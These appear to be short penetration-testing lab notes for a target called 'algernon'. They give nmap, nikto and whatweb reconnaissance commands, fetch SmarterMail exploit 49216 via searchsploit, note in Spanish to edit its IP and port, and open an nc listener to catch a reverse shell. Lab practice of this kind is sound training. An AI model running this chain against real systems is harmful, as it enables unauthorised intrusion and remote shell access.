nmap -A -p- -oA algernon 192.168.59.65 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA algernon 192.168.59.65
nmap -sU -O -p- -oA algernon-udp 192.168.59.65
nikto -h 192.168.59.65:80
whatweb http://192.168.59.65
whatweb http://192.168.59.65:9998
http://192.168.59.65
http://192.168.59.65:9998
https://www.exploit-db.com/exploits/49216
searchsploit SmarterMail
searchsploit -m 49216
Cambiamos las ip y el puerto en 49216.py
nc -lvnp 21